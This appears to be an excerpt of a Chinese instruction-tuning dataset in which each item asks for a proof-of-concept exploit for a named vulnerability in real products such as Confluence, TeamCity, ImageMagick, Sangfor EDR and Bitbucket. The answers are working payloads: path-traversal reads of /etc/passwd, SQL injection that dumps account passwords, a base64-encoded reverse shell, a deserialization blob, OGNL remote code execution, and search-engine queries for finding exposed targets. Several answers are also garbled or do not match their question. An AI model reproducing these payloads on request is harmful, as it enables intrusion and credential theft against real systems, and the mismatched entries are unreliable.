  585. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437\n漏洞描述:银澎云计算 好视通视频会议系统 存在任意文件下载,攻击者可以通过漏洞获取敏感信息\n影响版本:``` 银澎云计算 好视通视频会议系统 ```\n网络测绘:``` app=\"Hanming-Video-Conferencing\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 银澎云计算 好视通视频会议系统\n2. app=\"Hanming-Video-Conferencing\"\n3. https://xxx.xxx.xxx.xxx/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/银澎云计算 好视通视频会议系统 任意文件下载 CNVD-2020-62437.md"}
    586. 

  586. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:1039家校通 万能密码绕过 CNVD-2020-31494\n漏洞描述:北京1039科技发展有限公司是一家专注驾校管理系统、驾校移动办公系统、驾校管理软件、驾校招生小程序开发等,为驾校提供无死角的驾校管理系统解决方案。 北京1039科技发展有限公司驾校管理系统存在万能密码绕过漏洞,攻击者可利用该漏洞获取数据库信息。\n影响版本:``` 1039家校通 v1.0 - v6.0 ```\n网络测绘:``` title=\"学员登录_1039家校通\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 1039家校通 v1.0 - v6.0\n2. title=\"学员登录_1039家校通\"\n3. /admin/Product/Comstye.aspx\n/Student/StudentLogin.aspx\n/Teacher/Index.aspx\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/1039家校通 万能密码绕过 CNVD-2020-31494.md"}
    587. 

  587. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Cerebro request SSRF漏洞\n漏洞描述:Cerebro是使用Scala、Play Framework、AngularJS和Bootstrap构建的开源的基于Elasticsearch Web可视化管理工具。您可以通过Cerebro对集群进行web可视化管理,如执行rest请求、修改Elasticsearch配置、监控实时的磁盘,集群负载,内存使用率等。其中某功能存在SSRF漏洞,攻击者通过发送特定的请求包可以探测内网信息\n影响版本:``` Cerebro ```\n网络测绘:``` app=\"Cerebro\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"Cerebro\"\n2. POST /rest/request\n\n{\"method\":\"GET\",\"data\":\"\",\"path\":\"robots.txt\",\"host\":\"https://www.baidu.com\"}\n3. POST /rest/request\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Cerebro request SSRF漏洞.md"}
    588. 

  588. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:ImageMagick任意文件读取漏洞 CVE-2022-44268\n漏洞描述:ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。 在ImageMagick 7.1.0-51版本及以前,其处理PNG文件的代码中存在一处功能,会导致转换图片时读取到当前操作系统上的任意文件,并将文件内容输出在图片内容中。 参考链接: - https://www.metabaseq.com/imagemagick-zero-days/ - https://github.com/ImageMagick/Website/blob/main/ChangeLog.md#710-52---2022-11-06\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-44268\n【POC利用方法】\n1. docker-compose up -d\n2. $newname = uniqid() . '.png';\nshell_exec(\"convert -resize 50x50 {$_FILES['file_upload']['tmp_name']} ./{$newname}\");\n3. python poc.py generate -i input.png -o poc.png -r /etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ImageMagick任意文件读取漏洞 CVE-2022-44268.md"}
    589. 

  589. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:深信服 EDR 后台任意用户登陆漏洞\n漏洞描述:深信服终端检测响应平台是深信服公司开发的一套EDR系统。攻击者利用该漏洞,登录任意用户\n影响版本:``` EDR <= v3.2.19 ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. EDR <= v3.2.19\n2. https://xxx.xxx.xxx.xxx/ui/login.php?user=admin\n3. 注意最后的admin需要为存在的用户名\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/深信服 EDR 后台任意用户登陆漏洞.md"}
    590. 

  590. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:宏景 HCM codesettree SQL注入漏洞 CNVD-2023-0874\n漏洞描述:宏景 HCM codesettree 接口存在SQL注入漏洞,攻击者通过漏洞可以获取到登陆系统的账号密码和数据库信息\n影响版本:宏景 HCM\n网络测绘:``` app=\"HJSOFT-HCM\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"HJSOFT-HCM\"\n2. /servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cusername~20from~20operuser~20~2d~2d\n/servlet/codesettree?flag=c&status=1&codesetid=1&parentid=-1&categories=~31~27~20union~20all~20select~20~27~31~27~2cpassword~20from~20operuser~20~2d~2d\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/宏景 HCM codesettree SQL注入漏洞 CNVD-2023-0874.md"}
    591. 

  591. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Alibaba AnyProxy fetchBody 任意文件读取漏洞\n漏洞描述:Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息\n影响版本:``` Alibaba AnyProxy < 4.0.10 ```\n网络测绘:``` \"anyproxy\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. Alibaba AnyProxy < 4.0.10\n2. /fetchBody?id=1/../../../../../../../../etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Alibaba AnyProxy fetchBody 任意文件读取漏洞.md"}
    592. 

  592. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:kkFileView getCorsFile 任意文件读取漏洞 CVE-2021-43734\n漏洞描述:kkFileView getCorsFile 3.6.0 版本以下存在任意文件读取漏洞,攻击者通过漏洞可以获取服务器中的任意文件,获取服务器敏感信息\n影响版本:``` kkFileView getCorsFile <= 3.6.0 ```\n网络测绘:``` body=\"kkFileView\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-43734\n【POC利用方法】\n1. kkFileView getCorsFile <= 3.6.0\n2. body=\"kkFileView\"\n3. /getCorsFile?urlPath=file:///etc/passwd\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/kkFileView getCorsFile 任意文件读取漏洞 CVE-2021-43734.md"}
    593. 

  593. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:图创软件 图书馆站群管理系统 任意文件读取漏洞\n漏洞描述:图创软件 图书馆站群管理系统 存在任意文件读取漏洞,攻击者通过漏洞可以读取任意文件\n影响版本:``` 图创软件 图书馆站群管理系统 ```\n网络测绘:``` \"广州图创\" && country=\"CN\" && body=\"/interlib/common/\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 图创软件 图书馆站群管理系统\n2. \"广州图创\" && country=\"CN\" && body=\"/interlib/common/\"\n3. GET /interlib/report/ShowImage?localPath=C:\\Windows\\system.ini HTTP/1.1\nHost: \nContent-Length: 4\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/图创软件 图书馆站群管理系统 任意文件读取漏洞.md"}
    594. 

  594. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Imagemagick 命令执行漏洞 CVE-2016–3714\n漏洞描述:ImageMagick是一款使用量很广的图片处理程序,很多厂商都调用了这个程序进行图片处理,包括图片的伸缩、切割、水印、格式转换等等。但近来有研究者发现,当用户传入一个包含『畸形内容』的图片的时候,就有可能触发命令注入漏洞。 参考链接: - [https://imagetragick.com](https://imagetragick.com/) - https://www.leavesongs.com/PENETRATION/CVE-2016-3714-ImageMagick.html - https://github.com/ImageTragick/PoCs\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. POST / HTTP/1.1\nHost: your-ip:8080\nContent-Length: 321\nOrigin: http://your-ip:8080\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryGqvKmZLh7bp9gMc1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.102 Safari/537.36\nAccept: */*\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9,en;q=0.8\n\n\n------WebKitFormBoundaryGqvKmZLh7bp9gMc1\nContent-Disposition: form-data; name=\"file_upload\"; filename=\"avatar.jpg\"\nContent-Type: image/jpeg\n\npush graphic-context\nviewbox 0 0 640 480\nfill 'url(https://127.0.0.0/oops.jpg\"|curl \"www.your-domain.cn:2333)'\npop graphic-context\n------WebKitFormBoundaryGqvKmZLh7bp9gMc1--\n3. push graphic-context\nviewbox 0 0 640 480\nfill 'url(https://127.0.0.0/oops.jpg?`echo L2Jpbi9iYXNoIC1pID4mIC9kZXYvdGNwLzEwLjQzLjIzNy42MS8yMzMzIDA+JjEK | base64 -d | bash`\"||id \" )'\npop graphic-context\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/ImageMagick 命令执行漏洞 CVE-2016–3714.md"}
    595. 

  595. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133\n漏洞描述:Atlassian Bitbucket Data Center 存在远程代码执行漏洞。该漏洞是由于Atlassian Bitbucket Data Center 中的 Hazelcast 接口功能未对用户数据进行有效过滤,导致存在反序列化漏洞而引起的。攻击者利用该漏洞可以构造恶意数据远程执行任意代码。只有当 Atlassian Bitbucket Data Center 以 Cluster 模式安装时,才可能受该漏洞影响。\n影响版本:``` Atlassian Bitbucket Data Center >= 5.14.x Atlassian Bitbucket Data Center 6.x Atlassian Bitbucket Data Center < 7.6.14 Atlassian Bitbucket Data Center < 7.16.x Atlassian Bitbucket Data Center < 7.17.6 Atlassian Bitbucket Data Center < 7.18.4 Atlassian Bitbucket Data Center < 7.19.4 Atlassian Bitbucket Data Center 7.20.0 ```\n网络测绘:``` app=\"ATLASSIAN-Bitbucket\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2022-26133\n【POC利用方法】\n1. Atlassian Bitbucket Data Center >= 5.14.x\nAtlassian Bitbucket Data Center 6.x\nAtlassian Bitbucket Data Center < 7.6.14\nAtlassian Bitbucket Data Center < 7.16.x\nAtlassian Bitbucket Data Center < 7.17.6\nAtlassian Bitbucket Data Center < 7.18.4\nAtlassian Bitbucket Data Center < 7.19.4\nAtlassian Bitbucket Data Center 7.20.0\n2. app=\"ATLASSIAN-Bitbucket\"\n3. python3 CVE-2022-26133.py -u http://192.168.110.136:7990 -f target.txt\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Bitbucket Data Center 远程代码执行漏洞 CVE-2022-26133.md"}
    596. 

  596. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Mojarra JSF ViewState 反序列化漏洞\n漏洞描述:JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。 参考链接: - https://www.alphabot.com/security/blog/2017/java/Misconfigured-JSF-ViewStates-can-lead-to-severe-RCE-vulnerabilities.html - https://www.exploit-db.com/docs/48126 - https://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. docker-compose up -d\n2. $ java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 \"touch /tmp/success\" | gzip | base64 -w 0\nH4sIAAVGF18AA61WzW8bRRR/Yye2Y9zmo/lsaZvQlnxAd/PlJsURbT5Ia3BIhNNUwocwXk/sbde7293ZZINEb/wBCJX/AJBoOPRCqx6QKm4tFyQkUFEluHADDhUSFz7e7G5iKwnYLV1pd2bf17z35jdv3tYv0Ghb0HWFrlPJ4aomZVT9KitcpHYpy/j32ndv33g0dCwE4FrQWpEK+Hfn3r/x0Z3b42HkmxsJAGg5dx7EE0KrryhGWbIdXTKsokRNqpSY5FKN6pKqc2bpVJNcW+OKxC3qSsusbGqUMzuNY9PlxXv61s2xMETScGBV1QtM52865Tyz0nBwFRV0W2M8jXQ3B/HV/CZnilFgNodwLjeTg8iqolEbf9tyGeG2jMsW5VlBS2WgcVWnZYbMKl6WW6peRGbrquFw0+FLlmEyi6vCaKcvKGKXK/SUa4pY/8bHsbyF3/izp6NY/GFCJEzwQkgP5Wa2Hnf9EYkt/xiQI5/d/+vul8gehbNxCMMLUZiIwqkovEigxWaWSrUVZtmqoV9KzxEgrxM4MGvoNqc6X6Gawxo/7/3w8QePfnuVQGRK1VWOk/DA4AqBhlnMAoFm3Ebm52uZ5jWktGUMBc1SNI7/AbGBl1SbwKEsd/LLQU6X6KZm0AKBRFrXmeWljKFQMrNpG75zsunL2H5CLtBCkXH75D5WUgSavM1aM6wyAWsgg5iQERMyYkL2MSF7mJC3MSF7mJDnFhdSuX2ly1pF1vdHfZdZcjaYUo55u0j1gsaslEhJrGAoThnxQ+D0Ey2PqiXfDoY/8/+dIRB/zVWYKWh2FPoJfPJk+ajpQYGX5bnlhWlXtdNIotywaivVlUM1MCdw8DReEIgGuSQw/SwymTUcS2HzqoBxIkCgJA5pAuLwXBQGCIw9BWAJnK93RyxH52qZydN5GyGu8G1LBNq9YqEaFee903a2XsvblnbQQuB4jVhwi6YULSgFrZWq9pbvZBSGMGcoGPwT6BgYzOwRSyXgZTgdh5dAworBDUcp9cq8bKLXisJsOwbDWDSYyxQC/QN7i2e1SSyTQgVNjsKYMDmOVSzLqXJ1gZpB/amKamkDi83oxPBIMpmcnBgZGR8Zm0CNvkwNkRT0QQhrKPqF72FohAiOUVF7IebREA74FZeTjCPBsXHoNpBbnsgB/EY8ogwH8ZvwBaAZJnHE0gjtKCWUz+EbFrTdiuOeYq/PDBTFrAM6PT6BLuhGjR6c+z4Ks0cCs2mPuo/ZSc/skM/c1+zzcBQ1xOwYHMflKwvEYHAn6JPIEVLNn0KYZO6A3DbyBSQv3/IUz3hBESHR663fB604xpEVghPQAk3ONbiOtoB8u3NnHRF3VkcUuqLQHYWeeu+saz+rv06VL3Q/mzsrPG8Ye+6oUzXvKNSqp3ocJnCiDlMYegXwi/krTPn301/rBP8njkn9OJ7aheM2j3/I+7ZX7W6n2F2TQwMeK8vcIODa73mYOCr8dyUsyNLO1V3pztztblHELFlsTcOgJTzs7uZP/Q97v26ZfRACkgFS4rgdlewEknJaX8dNrS7mrom94qjoE7etUV03uCcjTe9M9yheuv97c8eD6x+HIJSBRJkJ4HhIw36tuapfw3KDXV0D3zSx42vd0w16y+9qbVGlMfrw3led73yDR2Me4mK75rHGG9h+NvGSxeySoRVcM+h2Exsx0fuK9HGIrSVpkp4ZnhQnJ+auWzUyCpXHNd1/AEKwhdeSCwAA\n3. - https://www.synacktiv.com/ressources/JSF_ViewState_InYourFace.pdf\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Mojarra JSF ViewState 反序列化漏洞.md"}
    597. 

  597. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Apache Airflow Celery 消息中间件命令执行 CVE-2020-11981\n漏洞描述:Apache Airflow是一款开源的,分布式任务调度框架。在其1.10.10版本及以前,如果攻击者控制了Celery的消息中间件(如Redis/RabbitMQ),将可以通过控制消息,在Worker进程中执行任意命令。 由于启动的组件比较多,可能会有点卡,运行此环境可能需要准备2G以上的内存。 参考链接: - https://lists.apache.org/thread/cn57zwylxsnzjyjztwqxpmly0x9q5ljx - [apache/airflow#9178](https://github.com/apache/airflow/pull/9178)\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2020-11981\n【POC利用方法】\n1. #初始化数据库\ndocker-compose run airflow-init\n\n#启动服务\ndocker-compose up -d\n2. pip install redis\npython exploit_airflow_celery.py [your-vps-ip]\n3. docker-compose logs airflow-worker\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Apache Airflow Celery 消息中间件命令执行 CVE-2020-11981.md"}
    598. 

  598. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Jetbrains TeamCity 认证绕过导致远程命令执行漏洞 CVE-2023-42793\n漏洞描述:TeamCity 是 JetBrains 的构建管理和持续集成服务器。 在 TeamCity 2023.05.3 版本及以前,存在一处由于逻辑错误导致的认证绕过漏洞,攻击者利用该漏洞最终可以在目标服务器上执行任意命令。 参考链接: - [https://www.sonarsource.com/blog/teamcity-vulnerability/](https://www.sonarsource.com/blog/teamcity-vulnerability/) - [https://blog.projectdiscovery.io/cve-2023-42793-vulnerability-in-jetbrains-teamcity/](https://blog.projectdiscovery.io/cve-2023-42793-vulnerability-in-jetbrains-teamcity/)\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-42793\n【POC利用方法】\n1. docker compose up -d\n2. POST /app/rest/users/id:1/tokens/RPC2 HTTP/1.1\nHost: your-vps-ip:8111\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.85 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 0\n3. <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?><token name=\"RPC2\" creationTime=\"2024-02-26T06:26:36.980Z\" value=\"eyJ0eXAiOiAiVENWMiJ9.bW8zdzY3TFJCTXRscmJsWkZFZTdYZEdqX1FN.NmQ2MWI4YTMtOTc5MC00NTA1LTkxOGItYmRkMmMwMDcwYjcw\"/>\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Jetbrains TeamCity 认证绕过导致远程命令执行漏洞 CVE-2023-42793.md"}
    599. 

  599. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:SonarQube search_projects 项目信息泄露漏洞\n漏洞描述:SonarQube 某接口存在信息泄露漏洞,可以通过工具下载源码\n影响版本:``` SonarQube ```\n网络测绘:``` app=\"sonarQube-代码管理\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. app=\"sonarQube-代码管理\"\n2. http://xxx.xxx.xxx.xxx/api/components/search_projects\n3. http://xxx.xxx.xxx.xxx/api/components/search_projects\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/SonarQube search_projects 项目信息泄露漏洞.md"}
    600. 

  600. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:HTTPoxy CGI 漏洞 CVE-2016-5385\n漏洞描述:根据RFC 3875规定,CGI(fastcgi)要将用户传入的所有HTTP头都加上`HTTP_`前缀放入环境变量中,而恰好大多数类库约定俗成会提取环境变量中的`HTTP_PROXY`值作为HTTP代理地址。于是,恶意用户通过提交`Proxy: http://evil.com`这样的HTTP头,将使用缺陷类库的网站的代理设置为`http://evil.com`,进而窃取数据包中可能存在的敏感信息。 PHP5.6.24版本修复了该漏洞,不会再将`Proxy`放入环境变量中。本环境使用PHP 5.6.23为例。 参考链接: - https://httpoxy.org/ - http://www.laruence.com/2016/07/19/3101.html\n影响版本:该漏洞不止影响PHP,所有以CGI或Fastcgi运行的程序理论上都受到影响。CVE-2016-5385是PHP的CVE,HTTPoxy所有的CVE编号如下: - CVE-2016-5385: PHP - CVE-2016-5386: Go - CVE-2016-5387: Apache HTTP Server - CVE-2016-5388: Apache Tomcat - CVE-2016-6286: spiffy-cgi-handlers for CHICKEN - CVE-2016-6287: CHICKEN’s http-client - CVE-2016-1000104: mod_fcgi - CVE-2016-1000105: Nginx cgi script - CVE-2016-1000107: Erlang inets - CVE-2016-1000108: YAWS - CVE-2016-1000109: HHVM FastCGI - CVE-2016-1000110: Python CGIHandler - CVE-2016-1000111: Python Twisted - CVE-2016-1000212: lighttpd\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2016-5385\n【POC利用方法】\n1. docker-compose up -d\n2. - CVE-2016-6287: CHICKEN’s http-client\n3. 如上图,可见此时的Origin已经变成`*.*.122.65`,也就是说真正进行HTTP访问的服务器是`*.*.122.65`,也就是说`*.*.122.65`已经将正常的HTTP请求代理了。\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/HTTPoxy CGI 漏洞 CVE-2016-5385.md"}
    601. 

  601. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞\n漏洞描述:亿赛通 电子文档安全管理系统 dataimport 存在远程命令执行漏洞,攻击者通过构造特定的请求可执行任意命令\n影响版本:``` 亿赛通 电子文档安全管理系统 ```\n网络测绘:``` title=\"电子文档安全管理系统\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. 亿赛通 电子文档安全管理系统\n2. title=\"电子文档安全管理系统\"\n3. /solr/admin/cores\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/亿赛通 电子文档安全管理系统 dataimport 远程命令执行漏洞.md"}
    602. 

  602. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:MeterSphere customMethod 远程命令执行漏洞\n漏洞描述:2022年1月5日,知道创宇404积极防御实验团队发现了MeterSphere开源持续测试平台的一处漏洞,并向MeterSphere研发团队进行了反馈。通过该漏洞攻击者可以在未授权的情况下执行远程代码,建议MeterSphere平台用户,尤其是可通过公网访问的用户尽快进行升级修复。\n影响版本:``` MeterSphere v1.13.0 - v1.16.3 ```\n网络测绘:``` body=\"MeterSphere\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. MeterSphere v1.13.0 - v1.16.3\n2. body=\"MeterSphere\"\n3. https://github.com/metersphere/metersphere/pull/9140/files\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/MeterSphere customMethod 远程命令执行漏洞.md"}
    603. 

  603. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:员工管理系统 Employee Management System 1.0 身份验证绕过\n漏洞描述:漏洞发现时间:2020-10-16 软件下载地址:https://www.sourcecodester.com/sites/default/files/download/razormist/employee-management-system.zip 验证环境:Windows 10 + xampp v3.2.4 参考链接: - https://www.exploit-db.com/exploits/48882\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. http://localhost:8081/Employee%20Management%20System/alogin.html\n2. anki' or 1=1#\n3. POST /Employee%20Management%20System/process/aprocess.php HTTP/1.1\nHost: localhost:8081\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:81.0) Gecko/20100101 Firefox/81.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\nAccept-Language: en-GB,en;q=0.5\nAccept-Encoding: gzip, deflate\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 70\nOrigin: http://localhost:8081\nConnection: close\nReferer: http://localhost:8081/Employee%20Management%20System/alogin.html\nCookie: PHPSESSID=infdfigld4et4jndfgbn33kcsv\nUpgrade-Insecure-Requests: 1\n\nmailuid=anki%27+or+1%3D1%23&pwd=anki%27+or+1%3D1%23&login-submit=Login\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/员工管理系统 Employee Management System 1.0 身份验证绕过.md"}
    604. 

  604. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:孚盟云 AjaxMethod.ashx SQL注入漏洞\n漏洞描述:孚盟云 AjaxMethod.ashx文件存在SQL注入漏洞,攻击者通过漏洞可获取服务器权限\n影响版本:``` 孚盟云 ```\n网络测绘:``` title=\"孚盟云 \" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【POC利用方法】\n1. title=\"孚盟云 \"\n2. http://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y%27\n3. sqlmap -u \"http://xxx.xxx.xxx.xxx/Ajax/AjaxMethod.ashx?action=getEmpByname&Name=Y\" -p Name --batch --random-agent --dbms mssql --dbs\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/孚盟云 AjaxMethod.ashx SQL注入漏洞.md"}
    605. 

  605. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence 敏感信息泄露 CVE-2021-26085\n漏洞描述:Confluence 是一个专业的企业知识管理与协同软件,也可以用于构建企业 wiki。使用简单,但它强大的编辑和站点管理特征能够帮助团队成员之间共享信息、文档协作、集体讨论,信息推送。该漏洞不是任意文件读取,只能读取一些 confluence 的配置文件,影响有限。 参考链接: - https://jira.atlassian.com/browse/CONFSERVER-67893\n影响版本:``` version < 7.4.10 7.5.0 ≤ version < 7.12.3 ```\n网络测绘:``` app=\"ATLASSIAN-Confluence\" ```\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2021-26085\n【POC利用方法】\n1. version < 7.4.10\n7.5.0 ≤ version < 7.12.3\n2. app=\"ATLASSIAN-Confluence\"\n3. /s/123cfx/_/;/WEB-INF/web.xml\n/s/123cfx/_/;/WEB-INF/decorators.xml\n/s/123cfx/_/;/WEB-INF/classes/seraph-config.xml\n/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.properties\n/s/123cfx/_/;/META-INF/maven/com.atlassian.confluence/confluence-webapp/pom.xml\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence 敏感信息泄露 CVE-2021-26085.md"}
    606. 

  606. {"instruction": "作为网络安全专家,请分析以下漏洞并提供POC利用方法:\n\n漏洞名称:Atlassian Confluence OGNL表达式注入命令执行漏洞 CVE-2023-22527\n漏洞描述:Atlassian Confluence是企业广泛使用的wiki系统。 在Confluence 8.0到8.5.3版本之间,存在一处由于任意velocity模板被调用导致的OGNL表达式注入漏洞,未授权攻击者利用该漏洞可以直接攻击Confluence服务器并执行任意命令。 参考链接: - [https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html](https://confluence.atlassian.com/security/cve-2023-22527-rce-remote-code-execution-vulnerability-in-confluence-data-center-and-confluence-server-1333990257.html) - [https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/](https://blog.projectdiscovery.io/atlassian-confluence-ssti-remote-code-execution/)\n", "input": "", "output": "【漏洞类型】web_application_vulnerability\n【CVE编号】CVE-2023-22527\n【POC利用方法】\n1. docker compose up -d\n2. POST /template/aui/text-inline.vm HTTP/1.1\nHost: your-vps-ip:8090\nAccept-Encoding: gzip, deflate, br\nAccept: */*\nAccept-Language: en-US;q=0.9,en;q=0.8\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36\nConnection: close\nCache-Control: max-age=0\nContent-Type: application/x-www-form-urlencoded\nContent-Length: 285\n\nlabel=\\u0027%2b#request\\u005b\\u0027.KEY_velocity.struts2.context\\u0027\\u005d.internalGet(\\u0027ognl\\u0027).findValue(#parameters.x,{})%2b\\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({\"id\"}))\n3. '+(#request['.KEY_velocity.struts2.context'].internalGet('ognl').findValue(@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({\"id\"})),{}))+'\n", "category": "poc_web_application_vulnerability", "source": "awesome_poc_dataset", "file_path": "Web应用漏洞/Atlassian Confluence OGNL表达式注入命令执行漏洞 CVE-2023-22527.md"}
    607. 

